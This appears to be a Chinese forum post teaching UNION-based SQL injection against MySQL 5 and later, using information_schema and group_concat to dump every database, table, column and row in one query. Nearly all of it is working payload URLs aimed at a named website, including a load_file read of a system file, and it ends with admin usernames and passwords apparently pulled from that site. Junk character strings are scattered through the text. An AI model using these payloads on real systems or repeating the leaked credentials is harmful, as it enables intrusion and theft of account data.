此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似, |& E! {7 P5 r$ o- }9 D0 Q
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
2 O& q/ U$ }7 _$ m
2 e( G* Z/ b& F+ K3 D
- H/ ^' O: z+ D优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
% L3 i6 ^/ U; e1 W* v) Z2 L2 c/ v. J% Y
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢..." v+ g5 N: {9 l" j- c8 V
2 y/ z0 S. P2 k, i* F下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
# c. G$ |3 N. [2 V0 x* Z在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等0 T$ b( j; o7 c: W
; c% o/ z. g4 Qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
. C' Z" g' s3 L! ^2 x0 \# T8 G, g" f9 ?/ B# X- U0 p
读出所有库:
. G, K' O, C; ] v A. d' Q& i9 vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA" u1 M' N5 ?- s( x/ s
3 ^" _; c. K8 |. b
( [+ c+ _0 w- C% W9 \& G, V
- |' C( ?( _8 h8 n }- Z, [+ [! S读出所有表:
% S* q; W' X/ X0 Q' ihttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
' ]5 k' W1 c4 k3 R: ~0 a2 m0 x5 a1 H& E4 x0 x) u6 N; B0 x
读出所有表字段:8 i' P; H6 f7 R& ?
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
: Y. D1 N# R" ~9 ^( {' q0 F*/ (97,100,109,105,110)为admin的ascii码 依次类推
0 H$ ~9 v) d+ N, E4 ~
5 ]3 Q" _* P- R6 N' `读出所有表字段里的内容:
+ I' T( x0 Q% f' p9 x! I+ `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
9 V0 r) V' V9 `9 X4 U) ^7 T2 w1 x' x4 h$ O2 U; H9 d3 D
# |" Y$ i% b* I3 }% Z
6 N4 p+ Y7 m. V/ c9 `
8 O% Y) t% Q/ L/ W/ x9 q3 x( ]4 F# k$ _( [7 W5 q
! `( H8 }& E F K3 ]http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23, V& u2 `9 v6 X( E, a& r; [, f
8 q% B6 ]+ i) ]4 b! [6 U: ?0 W
5 p! w% J, _$ \3 n1 qhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
1 \5 a- m' i& d
8 z! D6 Z8 N2 n: b; p% Mhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
& K* y% N; i1 s n. @% S0 z
^" a( F+ ]# d
0 G8 k# z& Q3 Phttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
. U' ^. n4 Q3 J: K/ \4 v2 U2 f: b) g1 ~6 v
% Q7 J' I# O4 Q, g9 h+ p6 K$ S/ D webmaster:dzb521123,simlab:simadmin20043233
9 K$ p* E/ t0 f- z |